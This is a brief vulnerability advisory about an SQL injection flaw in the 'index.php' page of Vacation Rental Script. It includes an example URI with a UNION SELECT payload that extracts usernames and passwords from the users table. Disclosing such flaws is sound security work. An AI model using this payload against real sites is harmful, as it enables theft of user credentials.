Vacation Rental Script 'index.php' SQL Injection Vulnerability

Vacation Rental Script 'index.php' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URI is available:
http://www.example.com/index.php?obj=sections&id=-1 UNION SELECT concat(username,0x3a,password) FROM users--